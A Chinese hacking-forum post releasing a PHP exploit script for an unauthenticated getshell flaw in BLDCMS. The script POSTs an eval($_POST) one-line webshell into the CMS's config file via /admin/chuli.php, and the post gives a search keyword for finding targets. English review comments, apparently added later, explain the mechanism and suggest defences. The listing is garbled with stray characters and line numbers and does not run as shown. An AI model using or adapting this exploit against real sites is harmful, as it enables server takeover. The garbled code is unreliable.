之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
既然都有人发了 我就把我之前写好的EXP放出来吧
02.<!--?php3 z: k% T9 d8 h7 W9 a1 m
// Command-line proof-of-concept for BLDCMS: prints a usage banner, reads three
// arguments, then sends one POST request to the CMS admin handler over a raw socket.
// NOTE(review): this listing is extraction-damaged (gutter numbers and stray
// characters are mixed into the code) and does not run as shown.
03.echo "-------------------------------------------------------------------
4 V$ r8 f% B) U6 L& N04. 4 y: z6 T2 R0 L' ~# ?
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
9 |5 y& z5 ^ W( v! G& J06. & m( z1 B: h) V$ ]
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
) C1 \4 X7 a* A( g& V08. : i/ o$ Z8 X1 m, p
09.QQ:981009941\r\n 2013.3.21\r\n ' W2 Y9 |8 r) C7 k1 W" Y* s
10. 1 ^+ u8 ]3 Y& j! c0 P
11.
. k0 \3 }+ Z A5 |) W6 I12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码) A. |, a1 l9 Q6 b7 n
13.
8 J, Y2 s3 Y6 J; b6 L. `" `+ z14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------5 M! x" C6 g8 H
15.
3 x9 R. I, ?" o! P6 q! N16.--------------------------------------------------------------------\r\n";; g* G" `& {/ }) C
// Arguments, in order: target host, install directory, and the name of the POST
// field that the injected code will evaluate.
17.$url=$argv[1];
" F6 p% J6 j/ J6 K( T6 H' q% A18.$dir=$argv[2];+ m2 |: V" U3 L4 R4 ?5 e3 o# T3 z
19.$pass=$argv[3];5 K1 E& Y% K$ z) X- L$ H
// The value starts with a single quote and a semicolon and then an eval() of a POST
// field, i.e. it is shaped to close a quoted PHP string in a generated file.
// The banner's "GPC=Off" fits this: presumably magic_quotes_gpc would escape the
// leading quote and neutralise the value — TODO confirm against the CMS source.
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';" p& ?3 s( n1 m( k
21.if (emptyempty($pass)||emptyempty($url))
3 P( w& f' J9 _1 f22.{exit("请输入参数");}* G1 W7 L# t3 q4 I7 \
23.else1 M4 Q/ `4 Y- Y! y3 O& m
24.{, p$ f) v: Y' N9 a# n/ e* Q
// Form body for the settings handler; of the submitted fields only `sqlite`
// carries the injected value, the rest are filler.
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev, s" _1 b' b" i, M8 O9 |
26.
5 P3 W5 l/ ? A7 F X27.al;- k+ m7 O# Z' D( \. L
28.$length = strlen($fuckdata);. l/ O9 A- ?3 F
29.function getshell($url,$pass); O& Y; E6 q; K3 C, r7 E' q2 h1 [
30.{9 _4 m! W, o( a, n. t& K& U Z
31.global $url,$dir,$pass,$eval,$length,$fuckdata;% G9 Y! R" {# @* ?3 q8 b
// The request is addressed to /admin/chuli.php?action=a_1 and carries no cookie or
// credential header, so the script relies on the handler accepting the write
// without a session — NOTE(review): confirm against the CMS source.
// Defender view: require an authenticated admin session for everything under
// /admin/, and alert on POSTs to this path whose `sqlite` field contains quote
// characters or PHP function names.
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
1 u& t( E; @ f1 w( u# C33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";+ H; f) B9 ^3 M. l( T0 }$ u* G
34.$header .= "User-Agent: MSIE\r\n";
. \; W, c c( u3 A- ]% `3 i35.$header .= "Host:".$url."\r\n";
' h! C+ \7 y) b C( e36.$header .= "Content-Length: ".$length."\r\n";7 l/ p, z7 R' I9 m# }
37.$header .= "Connection: Close\r\n";
% g* m2 ^ i( c* S/ S38.$header .="\r\n";
+ \, R/ h" c+ @ ]+ l39.$header .= $fuckdata."\r\n\r\n";- E: V& j5 v8 W/ {) A
40.$fp = fsockopen($url, 80,$errno,$errstr,15);! n' p( `; T* N/ I1 [$ `2 a" R
41.if (!$fp)
" {$ i8 u+ O' ~42.{
% c/ E) _/ e4 r' K" C43.exit ("利用失败:请检查指定目标是否能正常打开");- W6 p9 S6 }" v8 v. g4 ?
44.}7 L7 \: `1 H% w6 n6 A
45.else{ if (!fputs($fp,$header))
; g$ O: W$ C$ P( r- [) I6 c/ Y46.{exit ("利用失败");}: m) a' V9 }2 k6 b/ v% k
47.else
3 k; D, f u% K8 q' m+ D) i48.{ k* t9 J5 F& m g
49.$receive = '';
. y/ S. w# W! A) z: E( E50.while (!feof($fp)) {0 N/ Z( q z4 U6 n1 ?) I6 X M
51.$receive .= @fgets($fp, 1000);6 b* Z9 F5 b; A$ W' K$ R
52.}
: Z# M9 e& |5 D- r& H' [53.@fclose($fp);- Z% a7 j# P2 R$ E8 z7 H: x
// The response in $receive is collected but never inspected; the message below is
// printed regardless of what the server answered.
// conn/config/normal2.php is the file this script points at afterwards, so it is
// the file to audit on an affected install: an eval( or $_POST reference inside
// it indicates tampering. Presumably the handler writes submitted settings into
// that file unescaped; the remedy would be to authenticate the handler and to
// escape or whitelist values before they are written into PHP source.
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标) X9 q! y# ~" _0 `
55. " v: }) t9 i! Y( P8 C" Q2 i
56.GPC是否=off)";
8 p6 ?, w$ z3 o" @/ ^ H- J57.}}
/ ?' B9 D3 ^. @9 f) Z8 c58.}
) l0 i% P( j) ^: c59.}& T7 \7 I+ A$ B* K
60.getshell($url,$pass);# K3 D) j& l# |6 O4 C) d2 R7 [. Q
61.?-->/ Z; S( R* z" _ i
by 数据流